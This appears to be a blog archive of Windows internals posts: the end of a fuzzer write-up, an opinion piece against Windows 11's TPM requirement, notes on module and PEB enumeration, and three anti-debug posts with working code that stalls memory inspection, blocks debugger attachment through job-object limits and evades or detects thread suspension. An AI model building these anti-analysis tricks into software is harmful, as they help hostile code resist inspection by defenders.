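constexpr uint32_t MSR_IA32_FIXED_CTR_CTRL = 0x38d;
constexpr uint32_t MSR_IA32_PERF_GLOBAL_CTRL = 0x38f;

void ArmInstructionLimit(const uint64_t Limit) {
  //
  // Preload fixed counter 0 (instructions retired) with -Limit so that it
  // overflows, and raises a PMI, after Limit retired instructions. The
  // counter is 48 bits wide on most parts.
  //

  SetMsr(MSR_IA32_FIXED_CTR0, (1ull << 48) - Limit);

  //
  // Enable fixed counter 0 for ring 0 and ring 3, and turn on the PMI on
  // overflow (bits 0-1 select the privilege levels, bit 3 enables the PMI).
  //

  SetMsr(MSR_IA32_FIXED_CTR_CTRL, 0b1011);

  //
  // Globally enable fixed counter 0 (bit 32 of IA32_PERF_GLOBAL_CTRL).
  //

  SetMsr(MSR_IA32_PERF_GLOBAL_CTRL, 1ull << 32);
}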

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop, in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful, so I wanted to run the fuzzer on real hardware. After shopping around, I realized that Amazon didn't have any offerings that supported nested virtualization and that only Microsoft's Azure had SKUs with nested virtualization available. I rented one of them to try it out, but the hardware didn't support the VMX feature called unrestricted_guest. I can't quite remember why it mattered, but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be present, so I didn't use Azure either.

Instead, I rented a bare-metal server on Vultr for about $100/month. The CPU was a Xeon E3-1270v6, 4 cores / 8 threads @ 3.8GHz, which seemed good enough for my usage. The hardware also had a PMU, and that is where I developed wtf's support for it.

I was pretty happy because the fuzzer was running about 10x faster than with whv. It is not a fair comparison because those numbers weren't acquired on the same hardware, but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case generated executions of around 195 million instructions, with the following stats (as reported by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELFs possible. I built this corpus of 1.6 million ELF files and now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together, but I didn't like that idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator; it just distributes test cases to the clients and receives code coverage reports from them. You can think of the clients as runners that execute test cases and send the results back to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus with a single core would probably have taken weeks to complete, but it took only 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf, a distributed, code-coverage-guided, customizable, cross-platform, snapshot-based fuzzer designed for attacking user- and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereferences, stack-overflows, divisions by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following GitHub repository: fuzzing-ida75.

bounty.png

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

elf64.png

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend you try out their bounty program, as I am sure there's a lot left to be found.

Finally, big up to my bros yrp604 & __x86 for proofreading this article.

My talks @ BlackHat 2021 and DefCon29

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

Windows 11: TPMs and Digital Sovereignty

This article is an opinion held by a subset of members about Microsoft's potential plan to enforce a TPM requirement for using Windows 11 and various features. It will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with the enforcement. If you're unfamiliar with what a TPM is or its general function, we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine then, you ask? Well, the answer is quite simple. It's not about you; it's about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need only look at highly locked-down and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple App Store and the Google Play Store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has lain chiefly dormant because of critical missing infrastructure: until recently, a large majority of consumer machines did not have a TPM, which, as you'll learn later, is a critical component to making Palladium work. And while we won't deny that BitLocker is excellent if your device ever gets stolen, we will remind you that Microsoft has always sold this tyranny in a way that looks great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state in particular - in order to attest to a remote party that your machine is in a non-rooted state. It's very similar to Widevine L1 on Android devices; a third party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4K, but your hardware trust factor is low? Too bad, you'll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can't risk your pirating tools running in the background!

You might think that “It's okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it's not that simple. TPMs have keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose which TPM vendors they want to trust. Sound familiar to you? It's called Digital Rights Management, otherwise known as DRM.

Let's not forget that Intel initially shipped the Pentium III with a built-in serial number unique to each chip. It met much the same initial fate as Palladium: it was shot down by privacy groups, and the feature was subsequently removed.

A common misunderstanding

There seem to be a lot of misconceptions floating around on social media. In this section we'll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, much like when you root your phone. Remember the part earlier, though, about 4K video content? That won't be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides which users they trust with their content. Unfortunately, without a TPM, you aren't cutting it.

You've probably noticed that the marketing for this requirement is vague and confusing, and that's intentional. It doesn't do much for you, the consumer. However, it does set the stage for a future where Microsoft begins shipping its own TPM on your processor. Enter Microsoft's Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security to the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way for the PC to be locked into a nice controllable cube for all citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you're done reading it, you've forgotten how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn't going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard, which have existed for the better part of a decade, defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. Just as Microsoft won the Secure Boot battle a decade ago, becoming the sole owner of the Secure Boot keys, this move further tightens the screws on the liberties the PC gives us. While it won't be evident immediately upon the launch of Windows 11, the pieces are moving into place at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like bog-standard MEM_RESERVE, and it's possible to VirtualAlloc(MEM_RESERVE) as much as you want as well; however, APIs that interact with this memory do treat it differently.

How differently, you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute, and after that ProcessHacker remained unresponsive for a while as well. Subsequent runs didn't seem to seize up the whole system, however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler, it became a bit clearer what's happening. I'd bet that it's iterating through every single page table entry for the given memory range, and because we're dealing with terabytes of data at a time, that's over a billion iterations. (MiQueryAddressState is a large function, and I didn't think a short pseudocode snippet would do it justice.)

This is also reinforced by the fact that, from my testing, the relation between view size and time taken is completely linear. To further verify this idea, we can do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable, so with everything adding up, I'll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you'd want to surround your code with these sections, because only the reserved portions of the sections cause the slowdown. Furthermore, transactions could also be a solution for the non-empty file requirement, without touching anything already existing or creating anything visible to the user.
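
As a sketch of that transaction idea, assuming the regular KTM Win32 APIs and with error handling omitted, one could create the non-empty backing file inside a transaction that is never committed:

#include <windows.h>
#include <ktmw32.h>
#pragma comment(lib, "KtmW32.lib")

// Create a file inside a transaction that is never committed, so it can back
// the section without anything ever becoming visible on disk.
HANDLE create_backing_file()
{
    HANDLE transaction = CreateTransaction(nullptr, nullptr, 0, 0, 0, 0, nullptr);

    HANDLE file = CreateFileTransactedW(L"backing.tmp", GENERIC_READ | GENERIC_WRITE,
                                        0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,
                                        nullptr, transaction, nullptr, nullptr);

    // The section creation requires a non-empty file, so write a single byte.
    char  byte    = 0;
    DWORD written = 0;
    WriteFile(file, &byte, sizeof(byte), &written, nullptr);

    // Never calling CommitTransaction means the file is rolled back once the
    // transaction handle is closed.
    return file;
}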

Fin

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Process on a diet: anti-debug using job objects

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less than or equal to the current memory usage, we can prevent the creation of threads and the modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as the API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch are NtAssignProcessToJobObject, whose name is self-explanatory, and NtSetInformationJobObject, through which you set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to do is create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits = {};
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now, while this is sufficient for code that uses only syscalls and where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.
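
As a quick sanity check of the effect, once the snippet above has run, even a plain commit should be denied (a minimal illustration, assuming the limit is already below the current usage):

// With the job limit in place, any attempt to grow the process' committed
// memory fails, so this allocation returns nullptr.
void* probe = VirtualAlloc(nullptr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!probe)
    std::puts("commit denied - the job limit is active");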

The implications

So what does it do to debuggers and the like?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • Cannot set breakpoints.
  • x64dbg
    • will not be able to attach (with a build a few months old).
    • will terminate the process when placing a breakpoint (with a build a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not already private. So if you compile a small test program whose total size is less than a page, and the debugger sets entry breakpoints or the page otherwise ends up in the private commit before the anti-debug code runs, it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

New year, new anti-debug: Don’t Thread On Me

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added in 19H1. Ever wondered why there is a hole in the thread creation flags? Well, the hole has been filled with a flag that I'll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it's actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So, as you can see, NtSuspendProcess (which calls PsSuspendProcess) will simply skip any thread with this flag. Another bonus is that such a thread also doesn't get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so there isn't much you can do against it.

As far as its usefulness goes, I'd say this is just a nice little extra against dumping, and it causes confusion when you click suspend in ProcessHacker and the process continues to chug on as if nothing happened.

Example

For example, here is some somewhat funny code that will keep printing "I am running". I am sure that seeing this while reversing would cause a lot of confusion as to why the hell one would suspend their own process.

#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that the suspend count is a signed 8-bit value. Just like for the previous method, here's some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample (PsSuspendProcess), it has no error checking and doesn't care if a thread can't be suspended anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they'll actually leave the count in a state it wasn't previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.

for(size_t i = 0; i < 128; ++i)
  NtSuspendThread(thread, nullptr);

while(true) {
  if(NtSuspendThread(thread, nullptr) != STATUS_SUSPEND_COUNT_EXCEEDED)
    std::puts("I was suspended\n");
  Sleep(1000);
}

Conclusion

If anything, I hope that this demonstrated that it’s best not to rely on NtSuspendProcess to work as well as you’d expect for tools dealing with potentially malicious or protected code. Hope you liked this post and expect more content to come out in the upcoming weeks.

Enumerating process modules

On my quest of writing a library to wrap common WinAPI functionality using native APIs, I came across the need to enumerate process modules. One may think that there is a simple undocumented function to achieve this, however that is not the case.

Existing options

First of all, let's see what existing APIs are provided by Microsoft, because surely they know their own code and the operating system's limitations best.

  • Process Status API (PSAPI) has a rather understandable and simple interface: you get an array of module handles and then acquire information about each module using other functions. If you have written Windows-specific code before you might feel rather comfortable with it, but for a new developer the extensive error handling required by the possible need to reallocate memory might not be very fun.

    Structures and usage.

BOOL  EnumProcessModules(HANDLE process, HMODULE* modules, DWORD byteSize, DWORD* reqByteSize);
BOOL  GetModuleInformation(HANDLE process, HMODULE module, MODULEINFO* info, DWORD infoSize);
DWORD GetModuleFileNameEx(HANDLE process, HMODULE module, TCHAR* filename, DWORD filenameMaxSize);
  • Next up, Tool Help is at the same time simpler and more complex than PSAPI. It does not require the user to allocate memory himself and returns fully processed structures, but it requires quite a few extra steps. Toolhelp also leaves some opportunities for the user to shoot himself in the foot, such as returning INVALID_HANDLE_VALUE instead of nullptr on failure, and it requires cleaning up the resources by closing the snapshot handle (a short usage sketch follows after the list).

    Structures and usage.

HANDLE CreateToolhelp32Snapshot(DWORD flags, DWORD processId);
BOOL   Module32First(HANDLE snapshot, MODULEENTRY32* entry);
BOOL   Module32Next(HANDLE snapshot, MODULEENTRY32* entry);
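
Here is a minimal sketch of the Toolhelp usage pattern described above, with error handling reduced to the bare minimum:

#include <windows.h>
#include <tlhelp32.h>
#include <cstdio>

bool print_modules(DWORD process_id)
{
    // Note the INVALID_HANDLE_VALUE check instead of nullptr.
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32,
                                               process_id);
    if (snapshot == INVALID_HANDLE_VALUE)
        return false;

    MODULEENTRY32W entry{};
    entry.dwSize = sizeof(entry);

    // Module32First / Module32Next hand back fully processed entries.
    for (BOOL ok = Module32FirstW(snapshot, &entry); ok; ok = Module32NextW(snapshot, &entry))
        std::wprintf(L"%p %s\n", static_cast<void*>(entry.modBaseAddr), entry.szExePath);

    // The snapshot handle has to be cleaned up by the caller.
    CloseHandle(snapshot);
    return true;
}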

Performance

An important aspect of these functions is how fast they are. Below are some rough benchmarks of these APIs retrieving full module information, including the full path, on a machine running Windows 10 with an i7-8550U processor, compared to an implementation written by ourselves.

TLHELP   PSAPI     native
220 ms   2200 ms   50 ms

It turns out that while EnumProcessModules is really fast by itself, it only saves the DLL base address instead of something like the LDR_DATA_TABLE_ENTRY address where all of the information is stored. Because of this, every single time you want to, for example, get the module name, it repeats all the work of iterating the module list once again.

The implementation

So what exactly do we need to do to get the modules of another process?

In essence the answer is rather simple:

  • Get its Process Environment Block (PEB) address.
  • Walk the LDR table whose address we acquired from PEB.

The first problem is that a process may have 2 PEBs - one 32-bit and one 64-bit. The most intuitive behaviour would be to get the modules of the same architecture as the target process. However, NtQueryInformationProcess with the ProcessBasicInformation class gives us access only to the PEB of the same architecture as our own. This problem was solved in the previous post, so it will not be discussed further here.

The next problem is that the PEB is not the only thing that depends on the architecture. All structures and functions we plan to use will also need to be appropriately selected. To overcome this hurdle we will create 2 structures containing the correct functions and the type to use for representing pointers. We want to use different memory reading functions because, if we are a 32-bit process, NtReadVirtualMemory will expect a 32-bit address, which is not sufficient when the target process is 64-bit.

template<class TargetPointer>
struct native_subsystem {
  using target_pointer = TargetPointer;

  template<class T>
  NTSTATUS static read(void* handle, uintptr_t address,
                       T&    buffer, size_t    size = sizeof(T)) noexcept
  {
    return NtReadVirtualMemory(
      handle, reinterpret_cast<void*>(address), &buffer, size, nullptr);
  }
};

struct wow64_subsystem {
  using target_pointer = uint64_t;

  template<class T>
  NTSTATUS static read(void* handle, uint64_t address,
                       T&    buffer, uint64_t size = sizeof(T)) noexcept
  {
    return NtWow64ReadVirtualMemory64(handle, address, &buffer, size, nullptr);
  }
};

For convenience's sake and to keep our code DRY, we will also need to write some sort of helper function which picks one of the aforementioned structures to use. For that we will use some templates. If this doesn't suit you, macros or plain function pointers are an option, both of which come with their own set of pros and cons.

template<class Fn, class... As>
NTSTATUS subsystem_call(bool same_arch, Fn fn, As&&... args)
{
  if(same_arch)
    return fn.template operator()<native_subsystem<uintptr_t>>(std::forward<As>(args)...);
#ifdef _WIN64
  return fn.template operator()<native_subsystem<uint32_t>>(std::forward<As>(args)...);
#else
  return fn.template operator()<wow64_subsystem>(std::forward<As>(args)...);
#endif
}

While I agree this function looks rather ugly, operator() is really the sanest option because you don't have to worry about naming things. Its usage is rather simple too: all you have to do is pass it whether the architecture is the same and a structure whose templated operator() accepts the subsystem type. We can take a look at exactly how the usage looks by finally making use of the functions we wrote earlier and completing the first step of getting the correct PEB pointer.

template<class Callback>
NTSTATUS enum_modules(void* handle, Callback cb) noexcept
{
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  ret_on_err(NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr));

  const bool same_arch = is_process_same_arch(info);

  std::uint64_t peb_address;
  if(same_arch)
    peb_address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
  else
    ret_on_err(remote_peb_address(handle, false, peb_address));

  return subsystem_call(same_arch, enum_modules_t{}, handle, std::move(cb), peb_address);
}

Now all that is left is to implement the actual module enumeration, which I won't talk about as much because it is rather straightforward and information about it is easily found on the internet. For it to work you'll also need architecture-agnostic versions of the Windows structures, which can easily be made by templating their member types and some find+replace.
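
To give an idea of what templating the member types looks like, here is a rough, heavily abbreviated illustration; the field list follows the usual LDR_DATA_TABLE_ENTRY layout but is not a complete or verified definition:

template<class Ptr>
struct list_entry_t {
  Ptr Flink;
  Ptr Blink;
};

template<class Ptr>
struct unicode_string_t {
  std::uint16_t Length;
  std::uint16_t MaximumLength;
  Ptr           Buffer;
};

// Heavily truncated - only the first few members are shown.
template<class Ptr>
struct ldr_data_table_entry_t {
  list_entry_t<Ptr>     InLoadOrderLinks;
  list_entry_t<Ptr>     InMemoryOrderLinks;
  list_entry_t<Ptr>     InInitializationOrderLinks;
  Ptr                   DllBase;
  Ptr                   EntryPoint;
  Ptr                   SizeOfImage;
  unicode_string_t<Ptr> FullDllName;
  unicode_string_t<Ptr> BaseDllName;
  // ...
};

Instantiating these with a 32-bit or a 64-bit pointer type then gives the two variants that the enumeration code below selects between via its Subsystem parameter.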

struct enum_modules_t {
  template<class Subsystem, class Callback>
  NTSTATUS operator()(void* handle, Callback cb, std::uint64_t peb_address) const
  {
    using ptr_t = typename Subsystem::target_pointer;

    // we read the Ldr member of peb
    ptr_t Ldr;
    ret_on_err(Subsystem::read(handle,
                               static_cast<ptr_t>(peb_address) +
                                offsetof(peb_t<ptr_t>, Ldr),
                               Ldr));

    const auto list_head =
      Ldr + offsetof(peb_ldr_data_t<ptr_t>, InLoadOrderModuleList);

    // read InLoadOrderModulesList.Flink
    ptr_t load_order_modules_list_flink;
    ret_on_err(Subsystem::read(handle, list_head, load_order_modules_list_flink));

    ldr_data_table_entry_t<ptr_t> entry;

    // iterate over the modules list
    for(auto list_curr = load_order_modules_list_flink; list_curr != list_head;) {
      // read the entry
      ret_on_err(Subsystem::read(handle, list_curr, entry));

      // update the pointer to entry
      list_curr = entry.InLoadOrderLinks.Flink;

      // call the callback with the entry.
      // to get the full path we would need another read.
      cb(entry);
    }

    return STATUS_SUCCESS;
  }
};

Acquiring process environment block (PEB)

While attempting to enumerate the modules of a remote process, I came across the need to acquire the process environment block, or PEB for short. While it may seem quite simple - a single native API call and you are done - the problem is that there can actually be 2 environment blocks.

